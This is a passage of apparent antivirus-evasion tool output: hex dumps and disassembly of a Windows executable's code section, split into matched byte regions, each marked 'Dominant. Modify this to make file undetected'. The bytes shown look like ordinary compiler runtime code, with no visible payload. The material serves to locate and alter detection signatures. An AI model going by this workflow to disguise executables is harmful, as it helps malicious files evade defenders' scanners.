000051F0   FF FF 53 89 07 E8 00 F3 FF FF 8B 5D F8 8B 0B 8B    ..S........]....
00005200   09 89 01 8D 47 04 50 E8 EE F2 FF FF 8B 0B 56 8B    ....G.P.......V.
00005210   09 89 41 04 E8 E1 F2 FF FF 8B 0B 83 C4 10 8B 09    ..A.............
00005220   89 41 08 33 C0 EB 03 83 C8 FF 5F 5E 5B C9 C3 8B    .A.3......_^[...
00005230   FF 55 8B EC 83 EC 14 53 8B D9 57 89 5D EC 8B 03    .U.....S..W.]...
00005240   8B 38 85 FF 75 08 83 C8 FF E9 B7 00 00 00 8B 15    .8..u...........
00005250   04 A0 41 00 8B CA 56 8B 37 83 E1 1F                ..A...V.7...

Match 43: 21220 (size: 612)

Dominant. Modify this to make file undetected

.text

000052E4   0D 00 00 8B 15 04 A0 41 00 59 8B 03 8B 00 89 10    .......A.Y......
000052F4   8B 03 8B 00 89 50 04 8B 03 8B 00 89 50 08 33 C0    .....P......P.3.
00005304   5E 5F 5B C9 C3 8B FF 55 8B EC FF 75 08 68 2C AF    ^_[....U...u.h,.
00005314   41 00 E8 5A 00 00 00 59 59 5D C3 8B FF 55 8B EC    A..Z...YY]...U..
00005324   83 EC 10 6A 02 8D 45 08 89 45 F4 8D 4D FF 58 89    ...j..E..E..M.X.
00005334   45 F8 89 45 F0 8D 45 F8 50 8D 45 F4 50 8D 45 F0    E..E..E.P.E.P.E.
00005344   50 E8 06 FD FF FF C9 C3 8B FF 55 8B EC 8B 4D 08    P.........U...M.
00005354   85 C9 75 05 83 C8 FF 5D C3 8B 01 3B 41 08 75 0D    ..u....]...;A.u.
00005364   A1 04 A0 41 00 89 01 89 41 04 89 41 08 33 C0 5D    ...A....A..A.3.]
00005374   C3 8B FF 55 8B EC 83 EC 14 8D 45 08 89 45 EC 8D    ...U......E..E..
00005384   4D FF 6A 02 8D 45 0C 89 45 F0 58 89 45 F8 89 45    M.j..E..E.X.E..E
00005394   F4 8D 45 F8 50 8D 45 EC 50 8D 45 F4 50 E8 05 FD    ..E.P.E.P.E.P...
000053A4   FF FF C9 C3 C7 05 38 B2 41 00 38 A1 41 00 B0 01    ......8.A.8.A...
000053B4   C3 68 2C AF 41 00 E8 8D FF FF FF C7 04 24 38 AF    .h,.A........$8.
000053C4   41 00 E8 81 FF FF FF 59 B0 01 C3 E8 67 F7 FF FF    A......Y....g...
000053D4   B0 01 C3 8B FF 56 8B 35 04 A0 41 00 56 E8 95 0A    .....V.5..A.V...
000053E4   00 00 56 E8 08 4F 00 00 56 E8 8F 50 00 00 56 E8    ..V..O..V..P..V.
000053F4   39 F1 FF FF 56 E8 33 FA FF FF 83 C4 14 B0 01 5E    9...V.3........^
00005404   C3 6A 00 E8 D1 C3 FF FF 59 C3 8B FF 55 8B EC 51    .j......Y...U..Q
00005414   68 44 B2 41 00 8D 4D FF E8 54 00 00 00 B0 01 C9    hD.A..M..T......
00005424   C3 8B FF 56 FF 35 30 B2 41 00 E8 E8 0B 00 00 FF    ...V.50.A.......
00005434   35 34 B2 41 00 33 F6 89 35 30 B2 41 00 E8 D5 0B    54.A.3..50.A....
00005444   00 00 FF 35 10 AF 41 00 89 35 34 B2 41 00 E8 C4    ...5..A..54.A...
00005454   0B 00 00 FF 35 14 AF 41 00 89 35 10 AF 41 00 E8    ....5..A..5..A..
00005464   B3 0B 00 00 83 C4 10 89 35 14 AF 41 00 B0 01 5E    ........5..A...^
00005474   C3 8B FF 55 8B EC 56 8B 75 08 83 C9 FF 8B 06 F0    ...U..V.u.......
00005484   0F C1 08 75 15 57 BF 00 A2 41 00 39 3E 74 0A FF    ...u.W...A.9>t..
00005494   36 E8 81 0B 00 00 59 89 3E 5F 5E 5D C2 04 00 68    6.....Y.>_^]...h
000054A4   98 31 41 00 68 18 31 41 00 E8 A9 4D 00 00 59 59    .1A.h.1A...M..YY
000054B4   C3 8B FF 55 8B EC 80 7D 08 00 74 12 83 3D CC AC    ...U...}..t..=..
000054C4   41 00 00 74 05 E8 2A 13 00 00 B0 01 5D C3 68 98    A..t..*.....].h.
000054D4   31 41 00 68 18 31 41 00 E8 E2 4D 00 00 59 59 5D    1A.h.1A...M..YY]
000054E4   C3 8B FF 55 8B EC 8B 4D 10 8B 45 0C 81 E1 FF FF    ...U...M..E.....
000054F4   F7 FF 23 C1 56 8B 75 08 A9 E0 FC F0 FC 74 24 85    ..#.V.u......t$.
00005504   F6 74 0D 6A 00 6A 00 E8 07 53 00 00 59 59 89 06    .t.j.j...S..YY..
00005514   E8 92 0A 00 00 6A 16 5E 89 30 E8 CB 09 00 00 8B    .....j.^.0......
00005524   C6 EB 1A 51 FF 75 0C 85 F6 74 09 E8 E3 52 00 00    ...Q.u...t...R..
00005534   89 06 EB 05 E8 DA 52 00 00 59 59 33 C0 5E 5D C3    ......R..YY3.^].
00005544   6A 08 68 28                                        j.h(

Match 44: 24144 (size: 136)

Dominant. Modify this to make file undetected

.text

00005E50   50 FF 15 0C 20 41 00 85 C0 75 13 85 FF 75 0F 83    P... A...u...u..
00005E60   7D 08 FF 74 09 FF 75 08 E8 16 B5 FF FF 59 8B 4D    }..t..u......Y.M
00005E70   FC 33 CD 5F E8 60 AC FF FF C9 C3 8B FF 55 8B EC    .3._.`.......U..
00005E80   8B 45 08 A3 44 AF 41 00 5D C3 8B FF 55 8B EC 56    .E..D.A.]...U..V
00005E90   E8 4E 15 00 00 85 C0 74 29 8B B0 5C 03 00 00 85    .N.....t)..\....
00005EA0   F6 74 1F FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF    .t..u..u..u..u..
00005EB0   75 08 8B CE FF 15 20 21 41 00 FF D6 83 C4 14 5E    u..... !A......^
00005EC0   5D C3 FF 75 18 8B 35 04 A0 41 00 8B CE FF 75 14    ]..u..5..A....u.
00005ED0   33 35 44 AF 41 00 83 E1                            35D.A...

0x5e40: 0x00406a40 6a00 push 0 ; LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter
0x5e42: 0x00406a42 8bf8 mov edi, eax
0x5e44: 0x00406a44 ff1510204100 call dword [sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter] ; 0x412010 ; LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter)
0x5e4a: 0x00406a4a 8d85d8fcffff lea eax, [ExceptionInfo]
0x5e50: 0x00406a50 50 push eax ; struct _EXCEPTION_POINTERS *ExceptionInfo
0x5e51: 0x00406a51 ff150c204100 call dword [sym.imp.KERNEL32.dll_UnhandledExceptionFilter] ; 0x41200c ; LONG UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
0x5e57: 0x00406a57 85c0 test eax, eax
0x5e59: < 0x00406a59 7513 jne 0x406a6e
0x5e5b: 0x00406a5b 85ff test edi, edi
0x5e5d: < 0x00406a5d 750f jne 0x406a6e
0x5e5f: 0x00406a5f 837d08ff cmp dword [arg_8h], 0xffffffff
0x5e63: < 0x00406a63 7409 je 0x406a6e
0x5e65: 0x00406a65 ff7508 push dword [arg_8h]
0x5e68: 0x00406a68 e816b5ffff call fcn.00401f83
0x5e6d: 0x00406a6d 59 pop ecx
0x5e6e: ; CODE XREFS from fcn.00406942 @ 0x406a59(x), 0x406a5d(x), 0x406a63(x)
0x5e6e: > 0x00406a6e 8b4dfc mov ecx, dword [var_4h]
0x5e71: 0x00406a71 33cd xor ecx, ebp
0x5e73: 0x00406a73 5f pop edi
0x5e74: 0x00406a74 e860acffff call fcn.004016d9
0x5e79: 0x00406a79 c9 leave
0x5e7a: 0x00406a7a c3 ret
0x5e7b: ; CALL XREF from fcn.00405f75 @ +0x6c(x)
0x5e7b: 15: fcn.00406a7b (int32_t arg_8h);
0x5e7b: ; arg int32_t arg_8h @ ebp+0x8
0x5e7b: 0x00406a7b 8bff mov edi, edi
0x5e7d: 0x00406a7d 55 push ebp
0x5e7e: 0x00406a7e 8bec mov ebp, esp
0x5e80: 0x00406a80 8b4508 mov eax, dword [arg_8h]
0x5e83: 0x00406a83 a344af4100 mov dword [0x41af44], eax ; [0x41af44:4]=0
0x5e88: 0x00406a88 5d pop ebp
0x5e89: 0x00406a89 c3 ret
0x5e8a: ; CALL XREF from fcn.00406aee @ 0x406af5(x)
0x5e8a: 100: fcn.00406a8a (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h, int32_t arg_14h, int32_t arg_18h);
0x5e8a: ; arg int32_t arg_8h @ ebp+0x8
0x5e8a: ; arg int32_t arg_ch @ ebp+0xc
0x5e8a: ; arg int32_t arg_10h @ ebp+0x10
0x5e8a: ; arg int32_t arg_14h @ ebp+0x14
0x5e8a: ; arg int32_t arg_18h @ ebp+0x18
0x5e8a: 0x00406a8a 8bff mov edi, edi
0x5e8c: 0x00406a8c 55 push ebp
0x5e8d: 0x00406a8d 8bec mov ebp, esp
0x5e8f: 0x00406a8f 56 push esi
0x5e90: 0x00406a90 e84e150000 call fcn.00407fe3
0x5e95: 0x00406a95 85c0 test eax, eax
0x5e97: < 0x00406a97 7429 je 0x406ac2
0x5e99: 0x00406a99 8bb05c030000 mov esi, dword [eax + 0x35c]
0x5e9f: 0x00406a9f 85f6 test esi, esi
0x5ea1: < 0x00406aa1 741f je 0x406ac2
0x5ea3: 0x00406aa3 ff7518 push dword [arg_18h]
0x5ea6: 0x00406aa6 ff7514 push dword [arg_14h]
0x5ea9: 0x00406aa9 ff7510 push dword [arg_10h]
0x5eac: 0x00406aac ff750c push dword [arg_ch]
0x5eaf: 0x00406aaf ff7508 push dword [arg_8h]
0x5eb2: ; CODE XREF from fcn.00406a8a @ 0x406ae6(x)
0x5eb2: > 0x00406ab2 8bce mov ecx, esi
0x5eb4: 0x00406ab4 ff1520214100 call dword [0x412120]
0x5eba: 0x00406aba ffd6 call esi
0x5ebc: 0x00406abc 83c414 add esp, 0x14
0x5ebf: 0x00406abf 5e pop esi
0x5ec0: 0x00406ac0 5d pop ebp
0x5ec1: 0x00406ac1 c3 ret
0x5ec2: ; CODE XREFS from fcn.00406a8a @ 0x406a97(x), 0x406aa1(x)
0x5ec2: > 0x00406ac2 ff7518 push dword [arg_18h]
0x5ec5: 0x00406ac5 8b3504a04100 mov esi, dword [0x41a004] ; [0x41a004:4]=0xbb40e64e
0x5ecb: 0x00406acb 8bce mov ecx, esi
0x5ecd: 0x00406acd ff7514 push dword [arg_14h]
0x5ed0: 0x00406ad0 333544af4100 xor esi, dword [0x41af44] ; [0x41af44:4]=0
0x5ed6: 0x00406ad6 83e11f and ecx, 0x1f ; 31
0x5ed9: 0x00406ad9 ff7510 push dword [arg_10h]
0x5edc: 0x00406adc d3ce ror esi, cl
0x5ede: 0x00406ade ff750c push dword [arg_ch]
0x5ee1: 0x00406ae1 ff7508 push dword [arg_8h]
0x5ee4: 0x00406ae4 85f6 test esi, esi
0x5ee6: < 0x00406ae6 75ca jne 0x406ab2

Match 45: 24416 (size: 1360)

Dominant. Modify this to make file undetected

.text

00005F60   59 3B C8 1B C0 23 C1 83 C0 08 5D C3 8B 04 C5 9C    Y;...#....].....
00005F70   31 41 00 5D C3 8B FF 55 8B EC 56 E8 18 00 00 00    1A.]...U..V.....
00005F80   8B 4D 08 51 89 08 E8 A7 FF FF FF 59 8B F0 E8 18    .M.Q.......Y....
00005F90   00 00 00 89 30 5E 5D C3 E8 46 14 00 00 85 C0 75    ....0^]..F.....u
00005FA0   06 B8 F4 A0 41 00 C3 83 C0 14 C3 E8 33 14 00 00    ....A.......3...
00005FB0   85 C0 75 06 B8 F0 A0 41 00 C3 83 C0 10 C3 8B FF    ..u....A........
00005FC0   55 8B EC 56 8B 75 08 85 F6 74 0C 6A E0 33 D2 58    U..V.u...t.j.3.X
00005FD0   F7 F6 3B 45 0C 72 34 0F AF 75 0C 85 F6 75 17 46    ..;E.r4..u...u.F
00005FE0   EB 14 E8 2D F0 FF FF 85 C0 74 20 56 E8 12 43 00    ...-.....t V..C.
00005FF0   00 59 85 C0 74 15 56 6A 08 FF 35 B0 B3 41 00 FF    .Y..t.Vj..5..A..
00006000   15 9C 20 41 00 85 C0 74 D9 EB 0D E8 9B FF FF FF    .. A...t........
00006010   C7 00 0C 00 00 00 33 C0 5E 5D C3 8B FF 55 8B EC    ......3.^]...U..
00006020   83 7D 08 00 74 2D FF 75 08 6A 00 FF 35 B0 B3 41    .}..t-.u.j..5..A
00006030   00 FF 15 A0 20 41 00 85 C0 75 18 56 E8 6A FF FF    .... A...u.V.j..
00006040   FF 8B F0 FF 15 48 20 41 00 50 E8 E3 FE FF FF 59    .....H A.P.....Y
00006050   89 06 5E 5D C3 68 80 37 41 00 68 78 37 41 00 68    ..^].h.7A.hx7A.h
00006060   80 37 41 00 6A 01 E8 FF 00 00 00 83 C4 10 C3 68    .7A.j..........h
00006070   C0 37 41 00 68 B8 37 41 00 68 C0 37 41 00 6A 14    .7A.h.7A.h.7A.j.
00006080   E8 E5 00 00 00 83 C4 10 C3 68 D8 37 41 00 68 D0    .........h.7A.h.
00006090   37 41 00 68 D8 37 41 00 6A 16 E8 CB 00 00 00 83    7A.h.7A.j.......
000060A0   C4 10 C3 8B FF 55 8B EC 51 53 56 57 8B 7D 08 E9    .....U..QSVW.}..
000060B0   A2 00 00 00 8B 1F 8D 04 9D 48 AF 41 00 8B 30 89    .........H.A..0.
000060C0   45 FC 90 85 F6 74 0B 83 FE FF 0F 84 83 00 00 00    E....t..........
000060D0   EB 7D 8B 1C 9D 00 33 41 00 68 00 08 00 00 6A 00    .}....3A.h....j.
000060E0   53 FF 15 78 20 41 00 8B F0 85 F6 75 50 FF 15 48    S..x A.....uP..H
000060F0   20 41 00 83 F8 57 75 35 6A 07 68 B8 2B 41 00 53     A...Wu5j.h.+A.S
00006100   E8 03 FC FF FF 83 C4 0C 85 C0 74 21 6A 07 68 68    ..........t!j.hh
00006110   37 41 00 53 E8 EF FB FF FF 83 C4 0C 85 C0 74 0D    7A.S..........t.
00006120   56 56 53 FF 15 78 20 41 00 8B F0 EB 02 33 F6 85    VVS..x A.....3..
00006130   F6 75 0A 8B 4D FC 83 C8 FF 87 01 EB 16 8B 4D FC    .u..M.........M.
00006140   8B C6 87 01 85 C0 74 07 56 FF 15 70 20 41 00 85    ......t.V..p A..
00006150   F6 75 13 83 C7 04 3B 7D 0C 0F 85 55 FF FF FF 33    .u....;}...U...3
00006160   C0 5F 5E 5B C9 C3 8B C6 EB F7 8B FF 55 8B EC 8B    ._^[........U...
00006170   45 08 53 57 8D 1C 85 98 AF 41 00 8B 03 90 8B 15    E.SW.....A......
00006180   04 A0 41 00 83 CF FF 8B CA 33 D0 83 E1 1F D3 CA    ..A......3......
00006190   3B D7 75 04 33 C0 EB 51 85 D2 74 04 8B C2 EB 49    ;.u.3..Q..t....I
000061A0   56 FF 75 14 FF 75 10 E8 F7 FE FF FF 59 59 85 C0    V.u..u......YY..
000061B0   74 1D FF 75 0C 50 FF 15 74 20 41 00 8B F0 85 F6    t..u.P..t A.....
000061C0   74 0D 56 E8 32 E3 FF FF 59 87 03 8B C6 EB 19 A1    t.V.2...Y.......
000061D0   04 A0 41 00 6A 20 83 E0 1F 59 2B C8 D3 CF 33 3D    ..A.j ...Y+...3=
000061E0   04 A0 41 00 87 3B 33 C0 5E 5F 5B 5D C3 8B FF 55    ..A..;3.^_[]...U
000061F0   8B EC 56 68 F0 37 41 00 68 EC 37 41 00 68 F0 37    ..Vh.7A.h.7A.h.7
00006200   41 00 6A 1C E8 61 FF FF FF 8B F0 83 C4 10 85 F6    A.j..a..........
00006210   74 11 FF 75 08 8B CE 6A FA FF 15 20 21 41 00 FF    t..u...j... !A..
00006220   D6 EB 05 B8 25 02 00 C0 5E 5D C2 04 00 8B FF 55    ....%...^].....U
00006230   8B EC 56 E8 1D FE FF FF 8B F0 85 F6 74 27 FF 75    ..V.........t'.u
00006240   28 8B CE FF 75 24 FF 75 20 FF 75 1C FF 75 18 FF    (...u$.u .u..u..
00006250   75 14 FF 75 10 FF 75 0C FF 75 08 FF 15 20 21 41    u..u..u..u... !A
00006260   00 FF D6 EB 20 FF 75 1C FF 75 18 FF 75 14 FF 75    .... .u..u..u..u
00006270   10 FF 75 0C 6A 00 FF 75 08 E8 B3 01 00 00 50 FF    ..u.j..u......P.
00006280   15 A4 20 41 00 5E 5D C2 24 00 8B FF 55 8B EC 56    .. A.^].$...U..V
00006290   68 98 37 41 00 68 90 37 41 00 68 D0 2B 41 00 6A    h.7A.h.7A.h.+A.j
000062A0   03 E8 C4 FE FF FF 8B F0 83 C4 10 85 F6 74 0F FF    .............t..
000062B0   75 08 8B CE FF 15 20 21 41 00 FF D6 EB 06 FF 15    u..... !A.......
000062C0   60 20 41 00 5E 5D C2 04 00 8B FF 55 8B EC 56 68    ` A.^].....U..Vh
000062D0   A0 37 41 00 68 98 37 41 00 68 E4 2B 41 00 6A 04    .7A.h.7A.h.+A.j.
000062E0   E8 85 FE FF FF 8B F0 83 C4 10 85 F6 74 12 FF 75    ............t..u
000062F0   08 8B CE FF 15 20 21 41 00 FF D6 5E 5D C2 04 00    ..... !A...^]...
00006300   5E 5D FF 25 6C 20 41 00 8B FF 55 8B EC 56 68 A8    ^].%l A...U..Vh.
00006310   37 41 00 68 A0 37 41 00 68 F4 2B 41 00 6A 05 E8    7A.h.7A.h.+A.j..
00006320   46 FE FF FF 8B F0 83 C4 10 85 F6 74 12 FF 75 08    F..........t..u.
00006330   8B CE FF 15 20 21 41 00 FF D6 5E 5D C2 04 00 5E    .... !A...^]...^
00006340   5D FF 25 64 20 41 00 8B FF 55 8B EC 56 68 B0 37    ].%d A...U..Vh.7
00006350   41 00 68 A8 37 41 00 68 08 2C 41 00 6A 06 E8 07    A.h.7A.h.,A.j...
00006360   FE FF FF 8B F0 83 C4 10 85 F6 74 15 FF 75 0C 8B    ..........t..u..
00006370   CE FF 75 08 FF 15 20 21 41 00 FF D6 5E 5D C2 08    ..u... !A...^]..
00006380   00 5E 5D FF 25 68 20 41 00 8B FF 55 8B EC 56 68    .^].%h A...U..Vh
00006390   B8 37 41 00 68 B0 37 41 00 68 1C 2C 41 00 6A 12    .7A.h.7A.h.,A.j.
000063A0   E8 C5 FD FF FF 8B F0 83 C4 10 85 F6 74 15 FF 75    ............t..u
000063B0   10 8B CE FF 75 0C FF 75 08 FF 15 20 21 41 00 FF    ....u..u... !A..
000063C0   D6 EB 0C FF 75 0C FF 75 08 FF 15 5C 20 41 00 5E    ....u..u...\ A.^
000063D0   5D C2 0C 00 8B FF 55 8B EC 56 E8 90 FC FF FF 8B    ].....U..V......
000063E0   F0 85 F6 74 27 FF 75 28 8B CE FF 75 24 FF 75 20    ...t'.u(...u$.u 
000063F0   FF 75 1C FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF    .u..u..u..u..u..
00006400   75 08 FF 15 20 21 41 00 FF D6 EB 20 FF 75 1C FF    u... !A.... .u..
00006410   75 18 FF 75 14 FF 75 10 FF 75 0C 6A 00 FF 75 08    u..u..u..u.j..u.
00006420   E8 0C 00 00 00 50 FF 15 A8 20 41 00 5E 5D C2 24    .....P... A.^].$
00006430   00 8B FF 55 8B EC 56 E8 4D FC FF FF 8B F0 85 F6    ...U..V.M.......
00006440   74 12 FF 75 0C 8B CE FF 75 08 FF 15 20 21 41 00    t..u....u... !A.
00006450   FF D6 EB 09 FF 75 08 E8 13 48 00 00 59 5E 5D C2    .....u...H..Y^].
00006460   08 00 B9 20 B0 41 00 B8 98 AF 41 00 33 D2 3B C8    ... .A....A.3.;.
00006470   56 8B 35 04 A0 41 00 1B C9 83 E1 DE 83 C1 22 42    V.5..A........"B
00006480   89 30 8D 40 04 3B D1 75 F6 B0 01 5E C3 8B FF 55    .0.@.;.u...^...U
00006490   8B EC 80 7D 08 00 75 27 56 BE 48 AF 41 00 83 3E    ...}..u'V.H.A..>
000064A0   00 74 10 83 3E FF 74 08 FF 36 FF 15 70 20 41 00    .t..>.t..6..p A.

Match 46: 26592 (size: 136)

Dominant. Modify this to make file undetected

.text

000067E0   00 00 50 E8 50 46 00 00 59 59 85 C0 75 04 33 C0    ..P.PF..YY..u.3.
000067F0   EB 03 83 C8 FF 5E 5D C3 6A 01 E8 A7 FE FF FF 59    .....^].j......Y
00006800   C3 8B FF 55 8B EC 56 8B 75 08 57 8D 7E 0C 8B 07    ...U..V.u.W.~...
00006810   90 C1 E8 0D A8 01 74 25 8B 07 90 C1 E8 06 A8 01    ......t%........
00006820   74 1B FF 76 04 E8 F1 F7 FF FF 59 B8 BF FE FF FF    t..v......Y.....
00006830   F0 21 07 33 C0 89 46 04 89 06 89 46 08 5F 5E 5D    .!.3..F....F._^]
00006840   C3 8B FF 55 8B EC 83 EC 48 8D 45 B8 50 FF 15 38    ...U....H.E.P..8
00006850   20 41 00 66 83 7D EA 00 0F 84 97 00 00 00 53 8B     A.f.}........S.
00006860   5D EC 85 DB 0F 84 8A 00                            ].......

0x67d1: 0x004073d1 8b460c mov eax, dword [esi + 0xc]
0x67d4: 0x004073d4 90 nop
0x67d5: 0x004073d5 c1e80b shr eax, 0xb
0x67d8: 0x004073d8 a801 test al, 1 ; 1
0x67da: < 0x004073da 7412 je 0x4073ee
0x67dc: 0x004073dc 56 push esi ; uint32_t arg_8h
0x67dd: 0x004073dd e8be190000 call fcn.00408da0
0x67e2: 0x004073e2 50 push eax ; int32_t arg_8h
0x67e3: 0x004073e3 e850460000 call fcn.0040ba38
0x67e8: 0x004073e8 59 pop ecx
0x67e9: 0x004073e9 59 pop ecx
0x67ea: 0x004073ea 85c0 test eax, eax
0x67ec: < 0x004073ec 7504 jne 0x4073f2
0x67ee: ; CODE XREF from fcn.004073b0 @ 0x4073da(x)
0x67ee: > 0x004073ee 33c0 xor eax, eax
0x67f0: < 0x004073f0 eb03 jmp 0x4073f5
0x67f2: ; CODE XREFS from fcn.004073b0 @ 0x4073cf(x), 0x4073ec(x)
0x67f2: > 0x004073f2 83c8ff or eax, 0xffffffff ; -1
0x67f5: ; CODE XREFS from fcn.004073b0 @ 0x4073c4(x), 0x4073f0(x)
0x67f5: > 0x004073f5 5e pop esi
0x67f6: 0x004073f6 5d pop ebp
0x67f7: 0x004073f7 c3 ret
0x67f8: ; CALL XREF from fcn.00403208 @ +0x13(x)
0x67f8: ; CALL XREF from fcn.004060b5 @ 0x4060c9(x)
0x67f8: 9: fcn.004073f8 ();
0x67f8: 0x004073f8 6a01 push 1 ; 1 ; uint32_t arg_8h
0x67fa: 0x004073fa e8a7feffff call fcn.004072a6
0x67ff: 0x004073ff 59 pop ecx
0x6800: 0x00407400 c3 ret
0x6801: ; CALL XREF from fcn.00403208 @ +0x27(x)
0x6801: ; CALL XREF from fcn.0040b89b @ 0x40b8d5(x)
0x6801: 64: fcn.00407401 (int32_t arg_8h);
0x6801: ; arg int32_t arg_8h @ ebp+0x8
0x6801: 0x00407401 8bff mov edi, edi
0x6803: 0x00407403 55 push ebp
0x6804: 0x00407404 8bec mov ebp, esp
0x6806: 0x00407406 56 push esi
0x6807: 0x00407407 8b7508 mov esi, dword [arg_8h]
0x680a: 0x0040740a 57 push edi
0x680b: 0x0040740b 8d7e0c lea edi, [esi + 0xc]
0x680e: 0x0040740e 8b07 mov eax, dword [edi]
0x6810: 0x00407410 90 nop
0x6811: 0x00407411 c1e80d shr eax, 0xd
0x6814: 0x00407414 a801 test al, 1 ; 1
0x6816: < 0x00407416 7425 je 0x40743d
0x6818: 0x00407418 8b07 mov eax, dword [edi]
0x681a: 0x0040741a 90 nop
0x681b: 0x0040741b c1e806 shr eax, 6
0x681e: 0x0040741e a801 test al, 1 ; 1
0x6820: < 0x00407420 741b je 0x40743d
0x6822: 0x00407422 ff7604 push dword [esi + 4]
0x6825: 0x00407425 e8f1f7ffff call fcn.00406c1b
0x682a: 0x0040742a 59 pop ecx
0x682b: 0x0040742b b8bffeffff mov eax, 0xfffffebf ; 4294966975
0x6830: 0x00407430 f02107 lock and dword [edi], eax
0x6833: 0x00407433 33c0 xor eax, eax
0x6835: 0x00407435 894604 mov dword [esi + 4], eax
0x6838: 0x00407438 8906 mov dword [esi], eax
0x683a: 0x0040743a 894608 mov dword [esi + 8], eax
0x683d: ; CODE XREFS from fcn.00407401 @ 0x407416(x), 0x407420(x)
0x683d: > 0x0040743d 5f pop edi
0x683e: 0x0040743e 5e pop esi
0x683f: 0x0040743f 5d pop ebp
0x6840: 0x00407440 c3 ret
0x6841: ; CALL XREF from fcn.004074f7 @ +0xdb(x)
0x6841: 182: fcn.00407441 ();
0x6841: ; var int32_t var_4h @ ebp-0x4
0x6841: ; var int32_t var_14h @ ebp-0x14
0x6841: ; var uint32_t var_16h @ ebp-0x16
0x6841: ; var LPSTARTUPINFOW lpStartupInfo @ ebp-0x48
0x6841: 0x00407441 8bff mov edi, edi
0x6843: 0x00407443 55 push ebp
0x6844: 0x00407444 8bec mov ebp, esp
0x6846: 0x00407446 83ec48 sub esp, 0x48
0x6849: 0x00407449 8d45b8 lea eax, [lpStartupInfo]
0x684c: 0x0040744c 50 push eax ; LPSTARTUPINFOW lpStartupInfo
0x684d: 0x0040744d ff1538204100 call dword [sym.imp.KERNEL32.dll_GetStartupInfoW] ; 0x412038 ; VOID GetStartupInfoW(LPSTARTUPINFOW lpStartupInfo)
0x6853: 0x00407453 66837dea00 cmp word [var_16h], 0
0x6858: < 0x00407458 0f8497000000 je 0x4074f5
0x685e: 0x0040745e 53 push ebx
0x685f: 0x0040745f 8b5dec mov ebx, dword [var_14h]
0x6862: 0x00407462 85db test ebx, ebx
0x6864: < 0x00407464 0f848a000000 je 0x4074f4
0x686a: 0x0040746a 56 push esi
0x686b: 0x0040746b 8b33 mov esi, dword [ebx]
0x686d: 0x0040746d 8d4304 lea eax, [ebx + 4]
0x6870: 0x00407470 03c6 add eax, esi
0x6872: 0x00407472 8945fc mov dword [var_4h], eax
0x6875: 0x00407475 b8 invalid
0x6876: 0x00407476 0020 add byte [eax], ah

Match 47: 26864 (size: 408)

Dominant. Modify this to make file undetected

.text

000068F0   75 AA 5F 5E 5B C9 C3 8B FF 53 56 57 33 FF 8B C7    u._^[....SVW3...
00006900   8B CF 83 E0 3F C1 F9 06 6B F0 38 03 34 8D 20 B0    ....?...k.8.4. .
00006910   41 00 83 7E 18 FF 74 0C 83 7E 18 FE 74 06 80 4E    A..~..t..~..t..N
00006920   28 80 EB 79 8B C7 C6 46 28 81 83 E8 00 74 10 83    (..y...F(....t..
00006930   E8 01 74 07 83 E8 01 6A F4 EB 06 6A F5 EB 02 6A    ..t....j...j...j
00006940   F6 58 50 FF 15 80 20 41 00 8B D8 83 FB FF 74 0D    .XP... A......t.
00006950   85 DB 74 09 53 FF 15 AC 20 41 00 EB 02 33 C0 85    ..t.S... A...3..
00006960   C0 74 1C 0F B6 C0 89 5E 18 83 F8 02 75 06 80 4E    .t.....^....u..N
00006970   28 40 EB 29 83 F8 03 75 24 80 4E 28 08 EB 1E 80    (@.)...u$.N(....
00006980   4E 28 40 C7 46 18 FE FF FF FF A1 CC AC 41 00 85    N(@.F........A..
00006990   C0 74 0A 8B 04 B8 C7 40 10 FE FF FF FF 47 83 FF    .t.....@.....G..
000069A0   03 0F 85 57 FF FF FF 5F 5E 5B C3 6A 0C 68 A8 90    ...W..._^[.j.h..
000069B0   41 00 E8 39 AA FF FF 6A 07 E8 2E 2D 00 00 59 33    A..9...j...-..Y3
000069C0   DB 88 5D E7 89 5D FC 53 E8 5F 2E 00 00 59 85 C0    ..]..].S._...Y..
000069D0   75 0F E8 6A FE FF FF E8 1B FF FF FF B3 01 88 5D    u..j...........]
000069E0   E7 C7 45 FC FE FF FF FF E8 15 00 00 00 8A C3 8B    ..E.............
000069F0   4D F0 64 89 0D 00 00 00 00 59 5F 5E 5B C9 C3 8A    M.d......Y_^[...
00006A00   5D E7 6A 07 E8 2B 2D 00 00 59 C3 8B FF 56 33 F6    ].j..+-..Y...V3.
00006A10   8B 86 20 B0 41 00 85 C0 74 0E 50 E8 D7 2D 00 00    .. .A...t.P..-..
00006A20   83 A6 20 B0 41 00 00 59 83 C6 04 81 FE 00 02 00    .. .A..Y........
00006A30   00 72 DD B0 01 5E C3 8B FF 55 8B EC 56 8B 75 08    .r...^...U..V.u.
00006A40   83 FE E0 77 30 85 F6 75 17 46 EB 14 E8 C3 E5 FF    ...w0..u.F......
00006A50   FF 85 C0 74 20 56 E8 A8 38 00 00 59 85 C0 74 15    ...t V..8..Y..t.
00006A60   56 6A 00 FF 35 B0 B3 41 00 FF 15 9C 20 41 00 85    Vj..5..A.... A..
00006A70   C0 74 D9 EB 0D E8 31 F5 FF FF C7 00 0C 00 00 00    .t....1.........
00006A80   33 C0 5E 5D C3 8B FF 55                            3.^]...U

0x68e1: 0x004074e1 884228 mov byte [edx + 0x28], al
0x68e4: ; CODE XREF from fcn.00407441 @ 0x4074bf(x)
0x68e4: 0x004074e4 8b45fc mov eax, dword [var_4h]
0x68e7: ; CODE XREFS from fcn.00407441 @ 0x4074a1(x), 0x4074a6(x), 0x4074af(x)
0x68e7: 0x004074e7 47 inc edi
0x68e8: 0x004074e8 83c004 add eax, 4
0x68eb: 0x004074eb 8945fc mov dword [var_4h], eax
0x68ee: 0x004074ee 3bfe cmp edi, esi
0x68f0: < 0x004074f0 75aa jne 0x40749c
0x68f2: ; CODE XREF from fcn.00407441 @ 0x407497(x)
0x68f2: 0x004074f2 5f pop edi
0x68f3: 0x004074f3 5e pop esi
0x68f4: ; CODE XREF from fcn.00407441 @ 0x407464(x)
0x68f4: 0x004074f4 5b pop ebx
0x68f5: ; CODE XREF from fcn.00407441 @ 0x407458(x)
0x68f5: 0x004074f5 c9 leave
0x68f6: 0x004074f6 c3 ret
